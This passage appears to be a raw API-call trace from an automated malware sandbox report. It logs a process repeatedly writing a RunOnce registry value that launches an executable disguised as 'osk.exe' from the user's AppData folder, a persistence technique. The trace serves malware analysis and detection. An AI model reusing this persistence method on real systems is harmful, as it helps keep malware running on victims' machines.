returned 0x0 [0101.781] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.781] RegCloseKey (hKey=0x280) returned 0x0 [0101.782] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.782] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.782] SetTimer (hWnd=0x20280, nIDEvent=0x23aa, uElapse=0xa, lpTimerFunc=0x0) returned 0x23aa [0101.782] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.796] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.796] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.796] KillTimer (hWnd=0x20280, uIDEvent=0x23aa) returned 1 [0101.796] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.797] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.797] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.797] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.797] RegCloseKey (hKey=0x280) returned 0x0 [0101.797] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.797] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.797] SetTimer (hWnd=0x20280, nIDEvent=0x23ab, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ab [0101.797] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.811] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.811] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.811] KillTimer (hWnd=0x20280, uIDEvent=0x23ab) returned 1 [0101.812] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.812] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.812] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.812] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.813] RegCloseKey (hKey=0x280) returned 0x0 [0101.813] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.813] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.813] SetTimer (hWnd=0x20280, nIDEvent=0x23ac, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ac [0101.813] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.827] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.827] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.827] KillTimer (hWnd=0x20280, uIDEvent=0x23ac) returned 1 [0101.827] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.828] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.828] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.828] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.828] RegCloseKey (hKey=0x280) returned 0x0 [0101.828] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.829] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.829] SetTimer (hWnd=0x20280, nIDEvent=0x23ad, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ad [0101.829] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.842] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.842] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.843] KillTimer (hWnd=0x20280, uIDEvent=0x23ad) returned 1 [0101.843] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.843] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.843] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.844] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.844] RegCloseKey (hKey=0x280) returned 0x0 [0101.844] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.844] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.844] SetTimer (hWnd=0x20280, nIDEvent=0x23ae, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ae [0101.844] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.858] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.858] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.858] KillTimer (hWnd=0x20280, uIDEvent=0x23ae) returned 1 [0101.858] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.859] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.859] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.859] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.859] RegCloseKey (hKey=0x280) returned 0x0 [0101.860] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.860] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.860] SetTimer (hWnd=0x20280, nIDEvent=0x23af, uElapse=0xa, lpTimerFunc=0x0) returned 0x23af [0101.860] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.874] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.874] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.874] KillTimer (hWnd=0x20280, uIDEvent=0x23af) returned 1 [0101.875] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.875] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.875] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.875] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.876] RegCloseKey (hKey=0x280) returned 0x0 [0101.876] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.876] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.876] SetTimer (hWnd=0x20280, nIDEvent=0x23b0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b0 [0101.876] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.889] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.889] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.889] KillTimer (hWnd=0x20280, uIDEvent=0x23b0) returned 1 [0101.890] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.890] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.890] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.890] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.891] RegCloseKey (hKey=0x280) returned 0x0 [0101.891] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.891] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.891] SetTimer (hWnd=0x20280, nIDEvent=0x23b1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b1 [0101.891] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.946] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.946] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.946] KillTimer (hWnd=0x20280, uIDEvent=0x23b1) returned 1 [0101.947] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.947] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.947] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.948] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.948] RegCloseKey (hKey=0x280) returned 0x0 [0101.948] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.948] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.948] SetTimer (hWnd=0x20280, nIDEvent=0x23b2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b2 [0101.948] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.951] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.951] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.952] KillTimer (hWnd=0x20280, uIDEvent=0x23b2) returned 1 [0101.952] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.952] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.952] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.953] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.953] RegCloseKey (hKey=0x280) returned 0x0 [0101.953] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.953] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.953] SetTimer (hWnd=0x20280, nIDEvent=0x23b3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b3 [0101.953] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.967] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.967] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.967] KillTimer (hWnd=0x20280, uIDEvent=0x23b3) returned 1 [0101.968] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.968] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.968] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.968] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.969] RegCloseKey (hKey=0x280) returned 0x0 [0101.969] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.969] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.969] SetTimer (hWnd=0x20280, nIDEvent=0x23b4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b4 [0101.969] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.983] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.983] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.983] KillTimer (hWnd=0x20280, uIDEvent=0x23b4) returned 1 [0101.983] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.984] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.984] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.984] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.984] RegCloseKey (hKey=0x280) returned 0x0 [0101.984] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.984] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.984] SetTimer (hWnd=0x20280, nIDEvent=0x23b5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b5 [0101.984] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.998] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.998] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.998] KillTimer (hWnd=0x20280, uIDEvent=0x23b5) returned 1 [0101.999] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.999] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.999] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0102.000] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0102.000] RegCloseKey (hKey=0x280) returned 0x0 [0102.000] IUnknown:Release (This=0x7a9740) returned 0x1 [0102.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.000] SetTimer (hWnd=0x20280, nIDEvent=0x23b6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b6 [0102.000] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0102.016] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0102.016] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0102.016] KillTimer (hWnd=0x20280, uIDEvent=0x23b6) returned 1 [0102.017] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.017] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0102.017] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0102.017] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0102.018] RegCloseKey (hKey=0x280) returned 0x0 [0102.018] IUnknown:Release (This=0x7a9740) returned 0x1 [0102.018] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.018] SetTimer (hWnd=0x20280, nIDEvent=0x23b7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b7 [0102.018] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0102.029] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0102.029] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0102.030] KillTimer (hWnd=0x20280, uIDEvent=0x23b7) returned 1 [0102.030] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.030] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0102.030] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0102.031] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0102.031] RegCloseKey (hKey=0x280) returned 0x0 [0102.031] IUnknown:Release (This=0x7a9740) returned 0x1 [0102.031] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.031] SetTimer (hWnd=0x20280, nIDEvent=0x23b8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b8 [0102.031] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0102.045] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0102.046] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0102.046] KillTimer (hWnd=0x20280, uIDEvent=0x23b8) returned 1 [0102.046] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.046] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0102.046] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0102.047] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0102.047] RegCloseKey (hKey=0x280) returned 0x0 [0102.047] IUnknown:Release (This=0x7a9740) returned 0x1 [0102.047] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.047] SetTimer (hWnd=0x20280, nIDEvent=0x23b9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23b9 [0102.047] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0102.062] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0102.062] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0102.062] KillTimer (hWnd=0x20280, uIDEvent=0x23b9) returned 1 [0102.063] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.063] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0102.063] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0102.063] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0102.064] RegCloseKey (hKey=0x280) returned 0x0 [0102.064] IUnknown:Release (This=0x7a9740) returned 0x1 [0102.064] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0102.064] SetTimer (hWnd=0x20280, nIDEvent=0x23ba, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ba [0102.064] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.105] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.105] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.105] KillTimer (hWnd=0x20280, uIDEvent=0x23ba) returned 1 [0103.105] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.108] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.108] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.108] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.108] RegCloseKey (hKey=0x280) returned 0x0 [0103.108] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.108] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.108] SetTimer (hWnd=0x20280, nIDEvent=0x23bb, uElapse=0xa, lpTimerFunc=0x0) returned 0x23bb [0103.108] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.204] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.204] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.205] KillTimer (hWnd=0x20280, uIDEvent=0x23bb) returned 1 [0103.205] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.205] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.206] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.206] RegCloseKey (hKey=0x280) returned 0x0 [0103.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.206] SetTimer (hWnd=0x20280, nIDEvent=0x23bc, uElapse=0xa, lpTimerFunc=0x0) returned 0x23bc [0103.206] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 